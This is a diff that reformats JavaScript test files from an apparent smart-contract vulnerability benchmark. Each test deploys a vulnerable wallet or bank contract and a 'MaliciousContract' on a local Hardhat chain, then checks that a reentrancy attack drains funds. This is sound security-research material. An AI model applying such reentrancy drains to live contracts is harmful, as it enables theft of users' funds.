a/smartbugs-curated/0.4.x/test/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3_test.js @@ -12,69 +12,79 @@ describe("Reentrancy Attack for 0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol", beforeEach(async function () { // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol/Log.json'); + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol/Log.json", + ); const logJson = JSON.parse(fs.readFileSync(logPath)); Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); log = await Log.deploy(); await log.waitForDeployment(); // Deploy w_WALLET contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol/W_WALLET.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol/W_WALLET.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); W_WALLET = await ethers.getContractFactory(json.abi, json.bytecode); victim = await W_WALLET.deploy(log.target); await victim.waitForDeployment(); - + // Deploy MaliciousContract with W_WALLET address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3_attack.sol:MaliciousContract"); + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3_attack.sol:MaliciousContract", + ); hacker = await MaliciousContract.deploy(victim.target); - }); - it('sanity check: reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol', async function () { - await expect(victim.Put( 0, { value: ethers.parseEther('2') })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther('2')); - await expect(victim.Collect(ethers.parseEther('2'))).to.not.be.reverted; + it("sanity check: reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol", async function () { + await expect(victim.Put(0, { value: ethers.parseEther("2") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("2"), + ); + await expect(victim.Collect(ethers.parseEther("2"))).to.not.be.reverted; expect(await ethers.provider.getBalance(victim.target)).to.equal(0); }); it("should successfully drain funds through reentrancy attack", async function () { // Initial deposit to victim contract - await victim.Put( 1, {value: ethers.parseEther("5") }); - - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + await victim.Put(1, { value: ethers.parseEther("5") }); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); // Initial deposit from maliciousContract on victim contract - await hacker.deposit({value: ethers.parseEther("5")}); + await hacker.deposit({ value: ethers.parseEther("5") }); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); //set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); let hackerBalance = await ethers.provider.getBalance(hacker.target); expect(hackerBalance).to.equal(0); // Perform reentrancy attack through MaliciousContract - await hacker.attack( ethers.parseEther("3")); + await hacker.attack(ethers.parseEther("3")); - // Check balances after attack const victimBalance = await ethers.provider.getBalance(victim.target); - const maliciousContractBalance = await ethers.provider.getBalance(hacker.target); + const maliciousContractBalance = await ethers.provider.getBalance( + hacker.target, + ); // Verify the attack was successful - + // victim has lost more than the 3 ethers from withdraw (10 -3 = 7) - expect(victimBalance).to.be.below(ethers.parseEther("7")); + expect(victimBalance).to.be.below(ethers.parseEther("7")); //hacker has more than the withdrawn amount expect(maliciousContractBalance).to.be.above(ethers.parseEther("3")); - }); }); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344_test.js index 75bd13b..627a76c 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344_test.js @@ -3,82 +3,92 @@ const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); const exp = require("constants"); -describe("Reentrancy Attack for 0x8c7777c45481dba411450c228cb692ac3d550344.sol", function () { - let ETH_VAULT; - let victim; - let MaliciousContract; - let hacker; - let Log; - let log; +describe("Reentrancy Attack for 0x8c7777c45481dba411450c228cb692ac3d550344.sol", function () { + let ETH_VAULT; + let victim; + let MaliciousContract; + let hacker; + let Log; + let log; - beforeEach(async function () { - // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344.sol/Log.json'); - const logJson = JSON.parse(fs.readFileSync(logPath)); - Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); - log = await Log.deploy(); - await log.waitForDeployment(); + beforeEach(async function () { + // Deploy Log contract + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344.sol/Log.json", + ); + const logJson = JSON.parse(fs.readFileSync(logPath)); + Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); + log = await Log.deploy(); + await log.waitForDeployment(); - // Deploy ETH_VAULT contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344.sol/ETH_VAULT.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - ETH_VAULT = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await ETH_VAULT.deploy(log.target); - await victim.waitForDeployment(); - //await eth_VAULT.setLog(log.target); // Set Log address after deployment + // Deploy ETH_VAULT contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344.sol/ETH_VAULT.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + ETH_VAULT = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await ETH_VAULT.deploy(log.target); + await victim.waitForDeployment(); + //await eth_VAULT.setLog(log.target); // Set Log address after deployment - // Deploy MaliciousContract with ETH_VAULT address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy MaliciousContract with ETH_VAULT address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it('sanity check: reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344.sol', async function () { - await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await expect(victim.CashOut(ethers.parseEther("10"))).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("0")); - }); + it("sanity check: reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344.sol", async function () { + await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.CashOut(ethers.parseEther("10"))).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("0"), + ); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.Deposit( {value: ethers.parseEther("5") }); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.Deposit({ value: ethers.parseEther("5") }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); - - - // Initial deposit from hacker on victim contract - await hacker.deposit({value: ethers.parseEther("5")}); - - - - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); - - // Set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); - - // Perform reentrancy attack through MaliciousContract - await hacker.attack( ethers.parseEther("4")); - - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - const maliciousContractBalance = await ethers.provider.getBalance(hacker.target); - - // Verify the attack was successful - - // victim has lost more than the 4 (10-4 = 6) ethers from withdraw - expect(victimBalance).to.be.below(ethers.parseEther("6")); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); - //hacker has more than the withdrawn amount - expect(maliciousContractBalance).to.be.above(ethers.parseEther("4")); - }); - }); - \ No newline at end of file + // Initial deposit from hacker on victim contract + await hacker.deposit({ value: ethers.parseEther("5") }); + + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); + + // Set hacker balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); + + // Perform reentrancy attack through MaliciousContract + await hacker.attack(ethers.parseEther("4")); + + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + const maliciousContractBalance = await ethers.provider.getBalance( + hacker.target, + ); + + // Verify the attack was successful + + // victim has lost more than the 4 (10-4 = 6) ethers from withdraw + expect(victimBalance).to.be.below(ethers.parseEther("6")); + + //hacker has more than the withdrawn amount + expect(maliciousContractBalance).to.be.above(ethers.parseEther("4")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5_test.js index 54b2021..522ebea 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5_test.js @@ -2,82 +2,91 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for 0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol", function () { - let X_WALLET; - let victim; - let MaliciousContract; - let hacker; - let Log; - let log; +describe("Reentrancy Attack for 0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol", function () { + let X_WALLET; + let victim; + let MaliciousContract; + let hacker; + let Log; + let log; - beforeEach(async function () { - // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol/Log.json'); - const logJson = JSON.parse(fs.readFileSync(logPath)); - Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); - Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); - log = await Log.deploy(); - await log.waitForDeployment(); + beforeEach(async function () { + // Deploy Log contract + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol/Log.json", + ); + const logJson = JSON.parse(fs.readFileSync(logPath)); + Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); + Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); + log = await Log.deploy(); + await log.waitForDeployment(); - // Deploy X_WALLET contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol/X_WALLET.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - X_WALLET = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await X_WALLET.deploy(log.target); - await victim.waitForDeployment(); - //await x_WALLET.setLog(log.target); // Set Log address after deployment + // Deploy X_WALLET contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol/X_WALLET.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + X_WALLET = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await X_WALLET.deploy(log.target); + await victim.waitForDeployment(); + //await x_WALLET.setLog(log.target); // Set Log address after deployment - // Deploy MaliciousContract with X_WALLET address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); - - it('sanity check: reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol', async function () { - await expect(victim.Put(0, { value: ethers.parseEther("10") })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await expect(victim.Collect(ethers.parseEther("10"))).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(0); - }); + // Deploy MaliciousContract with X_WALLET address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.Put( 1, {value: ethers.parseEther("5") }); + it("sanity check: reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol", async function () { + await expect(victim.Put(0, { value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.Collect(ethers.parseEther("10"))).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal(0); + }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.Put(1, { value: ethers.parseEther("5") }); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); // Initial deposit from maliciousContract on victim contract - await hacker.deposit({value: ethers.parseEther("5")}); + await hacker.deposit({ value: ethers.parseEther("5") }); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); //set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); let hackerBalance = await ethers.provider.getBalance(hacker.target); expect(hackerBalance).to.equal(0); // Perform reentrancy attack through MaliciousContract - await hacker.attack( ethers.parseEther("5")); + await hacker.attack(ethers.parseEther("5")); - // Check balances after attack const victimBalance = await ethers.provider.getBalance(victim.target); - const maliciousContractBalance = await ethers.provider.getBalance(hacker.target); + const maliciousContractBalance = await ethers.provider.getBalance( + hacker.target, + ); // Verify the attack was successful - + // victim has a drained account - expect(victimBalance).to.be.below(ethers.parseEther("5")); + expect(victimBalance).to.be.below(ethers.parseEther("5")); - // 5 original balance + 5 from initial deposit + // 5 original balance + 5 from initial deposit expect(maliciousContractBalance).to.be.above(ethers.parseEther("5")); - }); }); - \ No newline at end of file diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e_test.js index 6d225d1..6b330f5 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e_test.js @@ -2,80 +2,91 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for 0x941d225236464a25eb18076df7da6a91d0f95e9e.sol", function () { - let ETH_FUND; - let victim; - let MaliciousContract; - let hacker; - let Log; - let log; +describe("Reentrancy Attack for 0x941d225236464a25eb18076df7da6a91d0f95e9e.sol", function () { + let ETH_FUND; + let victim; + let MaliciousContract; + let hacker; + let Log; + let log; - beforeEach(async function () { - // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e.sol/Log.json'); - const logJson = JSON.parse(fs.readFileSync(logPath)); - Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); - log = await Log.deploy(); - await log.waitForDeployment(); + beforeEach(async function () { + // Deploy Log contract + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e.sol/Log.json", + ); + const logJson = JSON.parse(fs.readFileSync(logPath)); + Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); + log = await Log.deploy(); + await log.waitForDeployment(); - // Deploy ETH_FUND contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e.sol/ETH_FUND.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - ETH_FUND = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await ETH_FUND.deploy(log.target); // Set Log address on constructor - await victim.waitForDeployment(); + // Deploy ETH_FUND contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e.sol/ETH_FUND.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + ETH_FUND = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await ETH_FUND.deploy(log.target); // Set Log address on constructor + await victim.waitForDeployment(); - // Deploy MaliciousContract with ETH_FUND address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy MaliciousContract with ETH_FUND address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it('sanity check: reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e.sol', async function () { - await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await expect(victim.CashOut(ethers.parseEther("10"))).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("0")); - }); + it("sanity check: reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e.sol", async function () { + await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.CashOut(ethers.parseEther("10"))).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("0"), + ); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.Deposit( {value: ethers.parseEther("5") }); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.Deposit({ value: ethers.parseEther("5") }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + // Initial deposit from maliciousContract on victim contract + await hacker.deposit({ value: ethers.parseEther("2") }); - // Initial deposit from maliciousContract on victim contract - await hacker.deposit({value: ethers.parseEther("2")}); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("7")); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("7")); + //set the hackers balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); - //set the hackers balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); + // Perform reentrancy attack through MaliciousContract + await hacker.attack(ethers.parseEther("2")); + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + const maliciousContractBalance = await ethers.provider.getBalance( + hacker.target, + ); - // Perform reentrancy attack through MaliciousContract - await hacker.attack(ethers.parseEther("2")); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - const maliciousContractBalance = await ethers.provider.getBalance(hacker.target); + // Verify the attack was successful - // Verify the attack was successful - - // victim has lost more funds than the withdrawal - expect(victimBalance).to.be.below(ethers.parseEther("5")); + // victim has lost more funds than the withdrawal + expect(victimBalance).to.be.below(ethers.parseEther("5")); - // funds above initial deposit (2) - expect(maliciousContractBalance).to.be.above(ethers.parseEther("2")); - - }); - }); - \ No newline at end of file + // funds above initial deposit (2) + expect(maliciousContractBalance).to.be.above(ethers.parseEther("2")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b_test.js index a7a58e6..f605de3 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b_test.js @@ -2,73 +2,85 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for 0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol", function () { - let PENNY_BY_PENNY; - let victim; - let MaliciousContract; - let hacker; - let Log; - let log; +describe("Reentrancy Attack for 0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol", function () { + let PENNY_BY_PENNY; + let victim; + let MaliciousContract; + let hacker; + let Log; + let log; - beforeEach(async function () { - // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol/LogFile.json'); - const logJson = JSON.parse(fs.readFileSync(logPath)); - Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); - log = await Log.deploy(); - await log.waitForDeployment(); + beforeEach(async function () { + // Deploy Log contract + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol/LogFile.json", + ); + const logJson = JSON.parse(fs.readFileSync(logPath)); + Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); + log = await Log.deploy(); + await log.waitForDeployment(); - // Deploy PENNY_BY_PENNY contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol/PENNY_BY_PENNY.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - PENNY_BY_PENNY = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await PENNY_BY_PENNY.deploy(); - await victim.waitForDeployment(); - await victim.SetLogFile(log.target); // Set Log address after deployment + // Deploy PENNY_BY_PENNY contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol/PENNY_BY_PENNY.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + PENNY_BY_PENNY = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await PENNY_BY_PENNY.deploy(); + await victim.waitForDeployment(); + await victim.SetLogFile(log.target); // Set Log address after deployment - // Deploy MaliciousContract with PENNY_BY_PENNY address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy MaliciousContract with PENNY_BY_PENNY address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it('sanity check: reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol', async function () { - await expect(victim.Put(0, { value: ethers.parseEther('10') })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await expect(victim.Collect(ethers.parseEther('10'))).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(0); - }); + it("sanity check: reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol", async function () { + await expect(victim.Put(0, { value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.Collect(ethers.parseEther("10"))).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal(0); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.Put( 0, {value: ethers.parseEther("5") }); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.Put(0, { value: ethers.parseEther("5") }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + // Initial deposit from maliciousContract on victim contract + await hacker.deposit(0, { value: ethers.parseEther("2") }); - // Initial deposit from maliciousContract on victim contract - await hacker.deposit(0,{value: ethers.parseEther("2")}); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("7")); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("7")); + // Perform reentrancy attack through MaliciousContract + await hacker.attack(ethers.parseEther("2")); + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + const maliciousContractBalance = await ethers.provider.getBalance( + hacker.target, + ); - // Perform reentrancy attack through MaliciousContract - await hacker.attack(ethers.parseEther("2")); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - const maliciousContractBalance = await ethers.provider.getBalance(hacker.target); + // Verify the attack was successful - // Verify the attack was successful - - // victim has a drained account - expect(victimBalance).to.be.below(ethers.parseEther("5")); + // victim has a drained account + expect(victimBalance).to.be.below(ethers.parseEther("5")); - // 5 original balance + 2 from initial deposit - expect(maliciousContractBalance).to.be.above(ethers.parseEther("2")); - - }); - }); - \ No newline at end of file + // 5 original balance + 2 from initial deposit + expect(maliciousContractBalance).to.be.above(ethers.parseEther("2")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8_test.js index 81340c3..99fc9f4 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8_test.js @@ -2,83 +2,90 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for 0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol", function () { - let DEP_BANK; - let victim; - let MaliciousContract; - let hacker; - let Log; - let log; +describe("Reentrancy Attack for 0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol", function () { + let DEP_BANK; + let victim; + let MaliciousContract; + let hacker; + let Log; + let log; - beforeEach(async function () { - // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol/LogFile.json'); - const logJson = JSON.parse(fs.readFileSync(logPath)); - Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); - log = await Log.deploy(); - await log.waitForDeployment(); + beforeEach(async function () { + // Deploy Log contract + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol/LogFile.json", + ); + const logJson = JSON.parse(fs.readFileSync(logPath)); + Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); + log = await 